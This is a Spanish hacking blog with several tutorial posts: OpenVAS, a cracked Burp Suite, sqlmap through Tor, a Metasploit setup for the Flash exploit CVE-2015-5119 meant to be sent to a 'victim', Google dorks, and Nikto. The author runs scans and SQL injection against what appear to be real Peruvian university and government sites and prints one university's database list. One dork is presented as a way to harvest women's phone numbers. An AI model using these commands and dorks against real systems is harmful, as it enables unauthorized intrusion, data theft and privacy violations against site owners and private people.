HACKER ANGELWHITE GALC

domingo, 20 de septiembre de 2015

Auditando con OpenVAS Vulnerability Scanning

El Sistema de Evaluación de Vulnerabilidad abierto (OpenVAS) es un marco de diversos servicios y herramientas. El núcleo de esta arquitectura orientada a servicios protegida por SSL es el OpenVAS escáner. El escáner realiza muy eficientemente las pruebas reales de la vulnerabilidad de la red (NVTs) que se sirven con actualizaciones diarias a través de la RSS OpenVAS NVT o por medio de un servicio de alimento comercial.

¿Como Funciona?

Openvas es el servicio central que consolida el análisis de vulnerabilidad normal en una solución completa de gestión de vulnerabilidades. El Administrador controla el escáner a través de OTP (Protocolo de transferencia OpenVAS) y sí ofrece la basada en XML, apátridas Management Protocol OpenVAS (OMP). Toda la inteligencia se implementa en el Administrador de modo que es posible implementar varios clientes magras que se comporten consistentemente por ejemplo, con respecto a la filtración o clasificar los resultados del análisis. El Gerente también controla una base de datos SQL (con sede en sqlite) donde se almacenan centralmente toda la configuración y los datos de resultado de la exploración. Por último, Manager también se encarga de la gestión de control de acceso de usuario includiung con grupos y roles.

Actualizando repertorios 
--------------------------------------------------------------------------------------------------------------------------
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas
root@kali:~# openvas-setup

----------------------------------------------------------------------------------

Una ves actualizado veremos la conexion de nuestro servidor openvas.


root@kali:~# netstat -antp



























Ahora que tenemos corriendo el openvas lo que haremos sera administrar nuestras
credenciales de usuario administrativo para ello añadiremos lo siguiente:

root@kali:~# openvasmd --user=admin --new-password=123456

ustedes pueden poner los registros que deseen, ahora pasaremos a iniciar el servidor.

root@kali:~# openvas-start













Una ves hecho todo el procedimiento de configuracion, pasaremos abrir el entorno 
web de Openvas abriendo el navegador donde desee que inicie 





















Interactuando con la plataforma























como vemos Openvas es una plataforma web con muchas funciones  que nos van a facilitar
nuestra auditoria de todo el sistema de manera automatica y ejecutando buenos script
para mejor su  calidad.

Lo primero que haremos sera ir ala seccion configuration y dale en la pestaña "Tarjet"
















Luego de ello el daremos clip en el icono con forma de estrella que aparece al costado
del signo de interrogacion.

Pasaremos añadir un nombre a nuestro modulo en mi caso lo deje defauld : unamed
luego de ellos pondremos el Host o servidor IP que deseamos auditar.







una ves creado le damos create Task.

Luego de ello nos iremos a Scan Managemnt en la barra Task y configuramos nuestro
objetivo.






De igual manera le daremos en el icono de la estrella  y pondremos el nombre que le dimos a new a nuestro primer proyecto 
Los servicios que ofrece en la seccion Scanner puede ser configurado a su gusto.
Le damos create task nuevamente.
Como vemos hemos creado nuestro proyecto de auditoria con el host que hemos añadido, entonces lo que haremos sera darle clip en el icono "Play" es facil reconocerlo.
Luego de ello automaticamente el escaner establecere conexion con el servidor que deseamos auditar y esperaremos a que nos arroja resultados.
Happy Hacking !!!!! Saludos 

Auditando con Burp suite v1.6.12 Professional



Saludos fieles lectores nuevamente mis saludos para todos,tome mucho tiempo en volver a retomar mi humilde blog por motivos personales,deseo mandar saludos a todos mis amigos en general y a todos mis lectores que me han seguido durante todo estos años de vigencia,
Ante mano muchas gracias para todos! :)

Owasp (Open Web Application Security Project) - Este proyecto  lleva años ayudando a la comunidad de seguridad ya que nos permite facilitar nuestras investigaciones de auditorias en un entorno general, a lo largo de estos años ah contribuido un gran apoyo para empresas,organizaciones,estados, y personas independientes a evolucionar cada ves que se actualizan nuevas tendencias en la informática.

Burp suite Professional:


Puede ser utilizado con cualquier Sistema Operativo.


Descarga aquí versión FREE y PRO :
Requisito:
Tener instalado JAVA actualizado, Descargar aquí:





Nueva plataforma de Scanner:




Mis experiencias con esta herramienta es muy buena y estable ya que a nivel mundial se registran ataques grandes con la herramienta Burp Suite como la conocida empresa "Sony".
En este escenario utilizaremos la herramienta Burp suite v1.6.12 Professional de paga  Crackeada :) 
veamos la interface.
Se ve interesante verdad? vayamos a lo interesante,configurar la herramienta de manera sencilla.
Iremos a la casilla Proxy y le da daremos en la parte de abajo "Options" y eligiéremos la Tarjet y le daremos Edit  en la parte de abajo podemos cambiarlo por una IP  y Puerto de un proxy o lo que sea, yo lo dejare estable como local
























En esta versión llega con las opciones estándares de Auditoria es lo que mas me agrada por eso la utilizo en mis auditorias cuando me canso de hacerlas de manera manual.

Luego de ello tendremos que abrir cualquier navegador y configurar el proxy en este caso añadir la que escogimos en el Burp Suite, en esta oportunidad utilizare mi fiel amiga Mantra ahora pondremos los datos como vemos en la siguiente imagen:

























Luego de eso entraremos al navegador y pegamos la pagina web que vamos a interceptar y nos iremos rápidamente al Burp suite, posteriormente entraremos a la casilla "Proxy"y pondremos
"Intercept"
























como podemos observar hemos capturado la conexión de nuestro dispositivo con la red de dicha web,lo haremos sera darle Anti-clip a una URL y escoger la opción Send to Spider , como vemos en la siguiente imagen:

























Como vemos empieza analizar en navegador que estamos utilizando mediante la conexión que establecimos al entrar a la pagina web de manera automática.



















de la siguiente manera la herramienta hará un trabajo general de toda la estructura del servidor comprometido, no obstante pasaremos a entrar a la casilla "Tarjet" en la sesión "SiteMap"























Nosotros podemos entrar a los módulos u archivos que esten en el servidor de manera visible, dándonos una auditoria general y añadiendo Script de ataques para los Form de autocompletacion Bypasseando algunos login vulnerables, entonces escogeré un link de los resultados y le pondremos la siguiente opción


















Luego entraremos a la opción  "Scanner" en el modulo "Scan Queue" y comprobaremos si es una vulnerabilidad, no un Falso Positivo 
























No solamente puede ejecutar 1 por 1 ,si no que podemos auditar en general el escaneo, pero lo hice de manera individual para terminar esto de la manera mas rápida posible, como vemos tenemos vulnerabilidades Form Cleat-Text no obstante también lo siguiente:










SQL inyección que puede ser explotada mediante las Cokkies .


available databases [34]:
[*] information_schema
[*] unica_1
[*] unica_admision
[*] unica_alavanguardia
[*] unica_alavanguardia2
[*] unica_alumnos
[*] unica_asistencia
[*] unica_cci
[*] unica_centrocultural
[*] unica_cepu2011
[*] unica_cepu2012
[*] unica_cepu2012_1
[*] unica_chamilo
[*] unica_convention
[*] unica_dbresultados2011
[*] unica_dbresultados2011ok
[*] unica_egresados
[*] unica_empleo
[*] unica_indprocquimicos
[*] unica_investigacion
[*] unica_noticias
[*] unica_odontologia
[*] unica_onebase
[*] unica_onebasei
[*] unica_panacea
[*] unica_pedagogia
[*] unica_prueba
[*] unica_quimica
[*] unica_recursosh
[*] unica_registro
[*] unica_revista
[*] unica_taller
[*] unica_unica
[*] unica_wordpress


Esto es todo un saludo especial para todos 

Instalar Tor Browser en kali linux 2.0 / testeando con sqlmap



Saludos estimados lectores muy buenas noches a todos en esta oportunidad les enseñare a instalar Tor en su distro preferida Kali linux 2.0, la instalación sirve cualquier distro GNU.

Recordemos la función de Tor según los creadores


¿Que es la red Tor?

La red Tor es un grupo de servidores que funcionan con voluntarios que permite a las personas a mejorar su privacidad y seguridad en Internet. Usuarios de Tor emplean esta red mediante la conexión a través de una serie de túneles virtuales en lugar de hacer una conexión directa, permitiendo así que las dos organizaciones y personas para compartir información a través de redes públicas sin comprometer su privacidad. En la misma línea, Tor es una herramienta eficaz de eludir la censura, lo que permite a sus usuarios para llegar a destinos o contenidos bloqueados de otro modo. Tor también puede ser utilizado como un bloque de construcción para los desarrolladores de software crear nuevas herramientas de comunicación con una función de las características de privacidad.


¿Quienes utilizan la red?

Los individuos usan Tor para mantener sitios web de seguimiento de ellos y sus familiares, o para conectarse a sitios de noticias, servicios de mensajería instantánea o similares cuando estos son bloqueados por sus proveedores locales de Internet. Servicios ocultos de Tor permiten a los usuarios publicar sitios web y otros servicios sin necesidad de revelar la ubicación del sitio. Las personas también usan Tor para la comunicación sensible socialmente: salas y foros web de supervivientes de violación y abuso, o personas con enfermedades chatear.

Los periodistas usan Tor para comunicarse de forma más segura con confidentes y disidentes. Las organizaciones no gubernamentales (ONG) usan Tor para permitir a sus trabajadores conectarse a su sitio web en casa mientras están en un país extranjero, sin notificar a todas las personas cercanas que están trabajando con esa organización.

Grupos como Indymedia recomiendan Tor para salvaguardar la privacidad en línea y la seguridad de sus miembros. Los grupos de activistas como la Electronic Frontier Foundation (EFF) recomiendan Tor como un mecanismo para mantener las libertades civiles en línea. Corporaciones usan Tor como una forma segura de llevar a cabo análisis de la competencia, y para proteger a los patrones de contratación sensibles de espías. También lo utilizan para reemplazar las tradicionales VPNs, que revelan la cantidad exacta y el momento de la comunicación. ¿Qué lugares tienen empleados trabajando tarde? ¿Qué lugares tienen empleados consultoría sitios web de búsqueda de empleo? Que divisiones de investigación se comunican con los abogados de patentes de la compañía?

Una rama de la Marina de los EE.UU. usa Tor para la recolección de inteligencia de fuente abierta, y uno de sus equipos usó Tor cuando estén desplegados en el Medio Oriente recientemente. Aplicación de la ley usa Tor para visitar sitios web sin dejar direcciones IP del gobierno en sus registros web, y para la seguridad durante las operaciones de picadura.

La variedad de personas que usan Tor es en realidad parte de lo que lo hace tan seguro. Tor te esconde entre los demás usuarios de la red, por lo que la más poblada y diversa de la base de usuarios de Tor, se protegerá más su anonimato.

¿Por qué necesitamos Tor?

Usando Tor le protege contra una forma común de vigilancia en Internet conocida como "análisis de tráfico". El análisis de tráfico puede usarse para inferir que está hablando a quién sobre una red pública. Conocer el origen y destino de tu tráfico de Internet permite a otros a seguir su comportamiento e intereses. Esto puede afectar a su chequera si, por ejemplo, un sitio de comercio electrónico utiliza discriminación de precios sobre la base de su país o institución de origen. Puede incluso amenazar tu trabajo y seguridad física revelando quién y dónde se encuentra. Por ejemplo, si vas a viajar al extranjero y conectarse a los ordenadores de su empleador para revisar o enviar correo, puede revelar inadvertidamente tu nacionalidad y afiliación profesional a cualquiera que la observación de la red, incluso si la conexión está encriptada.


Entorno gráfico de como funciona Tor


Sin duda tor a lo largo de todos estos años , nos ha brindado muchos beneficios para nuestra navegación anonima, sobre todo para nuestras auditorias de pentesting en plataformas externas. 

Instalando Tor en Kali linux 2.0
Abriremos la terminal y ejecutaremos lo siguiente para descargar el tor de acuerdo a nuestra arquitectura, por mi parte descarge el archivo de 32bits
root@kali:~#  wget https://dist.torproject.org/torbrowser/5.0.2/tor-browser-linux32-5.0.2_en-US.tar.xz
Una ves descargado todo, pasaremos a extraer los archivos.
root@kali:~#  tar -xvf tor-browser-linux32-5.0.2_en-US.tar.xz




















Luego de haber extraido los archivos en una carpeta lo que haremos sera entrar al directorio pero antes daremos permisos root con credenciales de usuario.

root@kali:~# chown -R root:root tor-browser_en-US/

Luego de ello entraremos a la carpeta tor-browser_en-US/Browser

root@kali:~# cd ~/tor-browser_en-US/Browser
Lo siguiente sera configurar algunas configuraciones que tiene por defauld para corregirlos y tener nuestro tor 100 % funcional, lo abriremos por leafpad
root@kali:~# leafpad start-tor-browser
























Daremos en buscar y pondremos la palabra root y como vemos nos arroja la siguiente linea de permisos:
--------------------------------------------------------------------------------------------------------------------------
if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root.  Exiting."
exit 1
fi
--------------------------------------------------------------------------------------------------------------------------
lo que haremos simplemente sera añadir 1 a la variable 0 así de fácil.
--------------------------------------------------------------------------------------------------------------------------
if [ "`id -u`" -eq 1 ]; then
complain "The Tor Browser Bundle should not be run as root.  Exiting."
exit 1
fi
--------------------------------------------------------------------------------------------------------------------------
Guardamos y listo ejecutamos el ejecutable de la siguiente manera.
 ./start-tor-browser




Listo tenemos instalado el Tor Browser en nuestro Sistema operativo, ahora lo que haremos sera configurarlo para una prueba de pentesting.
Sqlmap and Tor Security Testing

Lo primero que haremos sera abrir el navegador TOR como vemos en la imagen anterior y entrar a preferencias > Advanced >Settings, lo que nos interesa es el puerto: 9150 con el puerto es suficiente para poder conectarnos desde mi terminal de SQLMAP al servidor TOR y enviar el ataque a la web victima.
root@kali:~# sqlmap -u "http://www.ejemplo.com/detalle.php?id=1" --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --dbs 


Saludos para todos! estimados lectores de este humilde blog :)

2015 Flash 0day exploit HackingTeam




Buenas tardes mis queridos lectores en esta oportunidad debo manifestar que mi blog lo eh abandonado demasiado tiempo, creo que no esta bien dejarlo de lado porque yo enseñando aprendo muchas muchas nuevas de este mundo de la seguridad informatica, por ende hare un compromiso de publicar un articulo por dia para actualizar el blog nuevamente como antes lo habia hecho, ante mano en esta oportunidad haremos un ataque por Metasploit Framework con el nuevo exploit que ha salido hace pocos meses que es el conocido 'CVE 2015-5119


Plataformas vulnerables:


        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
        Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
Descarga del exploit:

http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb


Lo primero que debemos hacer es guardar el exploit con el nombre que deseen no hay problema.
lo pueden hacer por el editor de texto, en mi caso lo hice por terminal con el comando nano como pueden apreciar en la siguiente imagen:


una ves finalizado nuestro exploit estara en el directorio principal en este caso /root/. lo que haremos sera primero crear una carpeta y mover nuestro exploit a los modulos de metasploit.
java0day.rb

root@kali:~# mkdir .msf4/modules/exploits/hackingteam
root@kali:~# mv java0day.rb .msf4/modules/exploits/hackingteam
root@kali:~# ls .msf4/modules/exploits/hackingteam
java0day.rb
root@kali:~# 
Descarga del payload smf:

https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/CVE-2015-5122/msf.swf


root@kali:~# mk dir -p /usr/share/metasploit-framework/data/exploits/CVE-2015-5119
root@kali:~# mv msf.swf / usr/share/metasploit-framework/data/exploits/CVE-2015-5119
root@kali:~# 

Una ves terminado, pasaremos abrir nuestro metasploit y añadiremos el siguiente comando para actualizar los modulos que añadimos.

msf > reload_all
[*] Reloading modules from all module paths...
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *



Ejecutando en exploit:

--------------------------------------------------------------------------------------------------------------------------
msf > use exploit/hackingteam/java0day

msf exploit(java0day) > set LPORT 8080

msf exploit(java0day) > set SRVPORT 80

msf exploit(java0day) > set URIPATH /

msf exploit(java0day) > set LHOST 192.168.219.128

msf exploit(java0day) > exploit
--------------------------------------------------------------------------------------------------------------------------










Mandamos el link a nuestra victima y automaticamente como siempre tendremos nuestra conexion establecida, saludos para todos.

No mostrare la explotacion de mi sistema, porque ya que sabemos como estamos adentro de un sistema.













Creado por Omar Rodriguez

Method Ninja of Google Hacking




Saludos antes de comenzar a redactar, deseo mandar saludos a un buen hermano con el seudónimo "Eduardo Desdes" la cual me a demostrado métodos nuevos de utilizar las Dorks de manera mas profesional e intelectual.

Como sabemos Google es un servicio de indexación  de paginas web's,fotos,ftps,ips,entre muchos datos que se alojan cuando utilizamos dicho servicio de manera respectiva.

Ejemplo de lo que sucede al navegar en Google

Al hacer clic en Enviar, Google rastrea e indexa el contenido de la URL tal como está en ese momento. Si cambias el contenido de una URL que tiene pendiente una solicitud de envío, es posible que los resultados del nuevo rastreo sean distintos a los resultados obtenidos con Explorar como Google. Asimismo, como Google vuelve a rastrear la página al enviarla, no importa si la URL que envías se ha analizado mediante la herramienta Explorar como Google con o sin procesamiento.

Una vez enviada la URL, es posible que tengas que esperar un poco hasta que Google procese la solicitud y rastree e indexe la página.

















Google nuestra arma de auditar de manera manual

Hemos hablado respectivamente que google es un buscador de todo tipo de datos a nivel mundial ya que contiene millones de millones de sitios enlazados al servicio del publico.

Para un auditor google es la mejor arma en todos los sentidos ya que nos va facilitar el trabajo de intelectual con un objetivo que deseamos auditar de manera rápida  y eficaz  al momento de concatenar con las denominadas " Dorks of Google " combinándolas para tener un mayor desenlace en nuestro objetivo.


Plataforma del atacante

















Uno de los servicios donde liberan miles de wikileaks es sin duda  http://pastebin.com/ durante los años de vigencia de este servicio se a alojado información de alto prestigio, pero lo que nosotros necesitaremos serán los Posts de dorks que podremos obtener mediante su búsqueda hasta el momento nos a indexeado 1,930 resultados ojo debo aclarar que  dicho servicio nos dará información de cualquier tipo de dorks como documentos,archivos,ftp,ip,cámaras e infinidades de dispositivos que tengan una interface de protocolo en la red mundial.

Todos hemos utilizado algunas dorks como:

Inurl:/noticias.php?id=
inurl:/eventos.php?id=
inurl:/detalles.php?id=
inurl:/principal.php?id=
inurl:/imagenes.php?id=
inurl:/videos.php?id=

Entre otras muchas que hemos visto en la web.

como vemos nos arrojan varios parámetros GET con la palabra noticias.php?id= , todo el mundo lo hace de manera recurrente consiguiendo mayormente vulnerabilidades de sql inyección.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'6' at line 1

Google es una gran base de datos donde se acumulan muchos datos sensibles por el descuido de los mismo administradores , depende del usuario malicioso para usar esta información para su conveniencia

Explicación de las dorks :

Las Dorks son una serie de sentencias conformadas por operadores de búsqueda avanzada de google , que nos sirve para perfeccionar nuestra búsqueda y para encontrar paginas vulnerables. A continuación mencionare unos cuantos comando principales.

inurl:(panel) el buscador mostrara todos los resultados tal que en su url este la palabra 'panel'

intitle:(inicio) el buscador mostrara todos los resultados tal que en su titulo de pagina este la palabra 'inicio'

intext:(contraseña) el buscador mostrara todos los resultados tal que en el texto se su pagina este la palabra 'contraseña'

filetype:(pdf) el buscador mostrara todos los resultados que sean de tipo pdf eso se puede reemplazar por php, html , jpg y cualquier otro archivo.

site:(edu.peel buscador mostrara todos los resultados tal que su dominio sea gob.pe, ejemplo www.uap.edu.pe

Se pueden poner mas de una palabra (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) Muestra los resultados que tengan la cadena 'contraseña usuario'

intext:(contraseña & usuario) Muestra los resultados que tengan 'contraseña' y 'usuario'

intext:(contraseña | usuario) Muestra los resultados que tengan 'contraseña' o 'usuario'

Se puede quitar resultados (esto sirve para todo los comandos) por ejemplo:

intext:(contraseña usuario) -intext:(sangre) Muestra los resultados que tengan la cadena 'contraseña usuario' y que no tengan la palabra 'sangre'

Ahora solo queda en su imaginación las dorks que desean armar  ! Por ejemplo

site:edu.pe intext:(usuario contraseña) filetype:php Esto mostrara los paneles de las webs de las universidades , al menos los de tipo php y que estén en español

site:pe intext:(femenino & telefono) filetype:xls Esto mostrara los teléfonos de mujeres del Perú jajaja.


Escenario dirigido a un servidor web:

Una anécdota que me encanto fue cuando  estuve auditando de manera manual y a la vez con burp Suite y una herramienta privada que programe la cual consta de hacer un escaneo general capturando al servidor de manera completa y efectiva de todos los archivos,módulos y demás que tengan en la misma.

Algún día liberare mi herramienta,pero por el momento estará en mi a mi disposición personal.
Cyberscan.py























la vulnerabilidad fue reportado, espero lo hayan parchado.

la adecdota es que con mi camarada Eduardo Desdes, estuvimos auditando una web "X", entonces empece a utilizar las herramientas que comente hace momentos, cabe destacar que la herramienta estaba en Joomla, me parecio interesante pero lo único que encontraba era falsos positivos y algunos XSS ya que por mi parte los encontraba de forma manual, por otra mi herramienta capturada el sitio web, entonces empece aburrirme y mi camarada me comento lo siguiente "Encontré un Error", mi primera impresión fue "WTF" como lo hiciste? ni con Joomscan xD! y me dijo pues " utilice una dork".me recordó a mis comienzos cuando buscaba parámetros  GET and POST para encontrar fallos a sitios arbitrarios o a un objetivo central

Lo interesante de todo esto es que me había olvidado de hacer un dns inverso al sitio web para ver que tiene sus subdominios.

Entonces fue cuando me enseño una dork peculiar :

site:ejemplo.gob.pe inurl:& -inurl:index.php

Entonces me di cuenta cuando ejecute la sentencia ' que era una Sql inyección ciega pues mi camarada efectivamente lo había explotado : )

Entonces comprobé la dork y efectivamente me sorprendió.





















El mejor  consejo que puedo dar es que no hay que discriminar, ni disminuir lo que las dork pueden encontrar mediante una búsqueda configurada para obtener datos dedicados para un ataque dirigido, aveces recordar nuestros comienzos pueden ser  utilices a la hora de utilizarlos, Gracias

Creado por Omar Rodriguez 

Auditando con Nikto 2 Web vulnerability Scanner




Saludos estimados lectores en esta oportunidad vamos aprender a utilizar Nikto en su nueva plataforma mejorada sin mas que decir vayamos a la acción.

Nikto es un código abierto,es escáner de servidor web que realiza pruebas exhaustivas a servidores web por varios elementos, incluyendo archivos potencialmente peligrosos,programas, controles de versiones no actualizadas de servidores, y los problemas específicos de la versión sobre servidores. También comprueba si hay elementos de configuración del servidor, tales como la presencia de múltiples archivos de índices, opciones de servidor HTTP, y tratará de identificar los servidores web instalados y software. Artículos de escaneo y plugins se actualizan con frecuencia y se pueden actualizar automáticamente.

Características

  • Estas son algunas de las características principales de Nikto. Consulte la documentación para obtener una lista completa de las características y la forma de utilizarlos.
  • Soporte SSL (Unix con OpenSSL o tal vez de Windows con ActiveState de
  • Perl / NetSSL)
  • Soporte de proxy HTTP completa
  • Comprueba la existencia de componentes de servidor obsoletos
  • Guardar informes en texto plano, XML, HTML, NBE o CSV
  • Motor de plantillas para personalizar fácilmente informes
  • Escanear múltiples puertos en un servidor o varios servidores a través de archivo de entrada (incluyendo salida de nmap)
  • Técnicas de codificación de IDS de LibWhisker
  • Fácilmente actualizado a través de línea de comandos
  • Identifica el software instalado mediante encabezados, favicons y archivos
  • Anfitrión de autenticación con Basic y NTLM
  • Adivinanzas Subdominio
  • Apache y cgiwrap nombre de usuario enumeración
  • Técnicas de mutación a "pescado" para el contenido en servidores web
  • Analiza tuning para incluir o excluir clases enteras de la vulnerabilidad
  • cheques
  • Adivina credenciales para reinos de autorización (incluyendo muchos Identificación del default / pw combos)
  • Autorización adivinando maneja cualquier directorio, no sólo la raíz
  • directorio
  • Reducción mejorada falso positivo a través de varios métodos: encabezados,
  • contenido de la página, y el contenido de hash
  • Informes cabeceras "inusuales" visto
  • Estado interactivo, pausa y cambios en los ajustes de verbosidad
  • Ahorre petición / respuesta completa para las pruebas positivas
  • Replay salvado solicitudes positivas
  • El tiempo máximo de ejecución por blanco
  • Auto-pausa en un momento determinado
  • Comprueba si hay sitios "estacionamiento" comunes
  • Ingreso a Metasploit


Descarga: https://cirt.net/Nikto2

Plataforma de ataque

Para este escenario utilizare el distro Kali Linux versión 2 ya que nitko viene instalada por defecto.
abriremos la terminal para intelectual con la plataforma:



























como vemos tenemos muchas opciones la cual vamos a interactuar  al momento de realizar un método distinto para cada auditoria que ejecutemos, lo que haremos sera algo básico y muy funcional para auditar toda la plataforma de manera rápida de la siguiente manera.

En esta prueba de concepto utilizare un sitio web vulnerable desde tiempos mitologicos xD!,para automatizar rápido el ataque porque ando en la oficina y no tengo mucho tiempo que digamos.

nikto -host www.uap.edu.pe




















Como podemos observar tenemos algunos BUG relacionados con complementos del servidor web y archivos en métodos GET,POST como tambien captura las cabeceras y elemtnos de entrada y saluda del servicio,no obstante podemos destacar que nos brinda información gathering y que tipo  de servidor esta en su dedicado como es "DAV", te acuerdo con esa recopilación podemos emitir muchos ataques dirigidos, pero tranquilo!! eso no es todo nikto todavía sigue en ejecución.


+ Cookie ASPSESSIONIDAARBBQAC created without the httponly flag
+ OSVDB-3092: /intranet/: This might be interesting...

Entre muchas mas ya que esta web tiene miles de datos en su servicio que no hay necesidad de mostrar por la prueba de concepto ético,como vemos Nitko esta desarrollado para testear los complementos de un servidor en busca de vulnerabilidades arrojando los Exploit para realizar la explotación de dichos agujeros de seguridad, que puede ser trabajada de la mano con msfconsole.

de igual manera podemos intelectual con la siguiente opción podemos inhabilitar la búsqueda de sectores 404.

nikto -host www.presidencia.gob.pe -no404












de la misma manera podemos acatar que esta herramienta posee una infraestructura muy buena porque nos permite ver que servicios de protección esta utilizando los conocidos "waf " .

Sin mas que decir me despido de todos ustedes, con fuerte abrazo! Saludos.
 
 
Creado Por Omar Rodriguez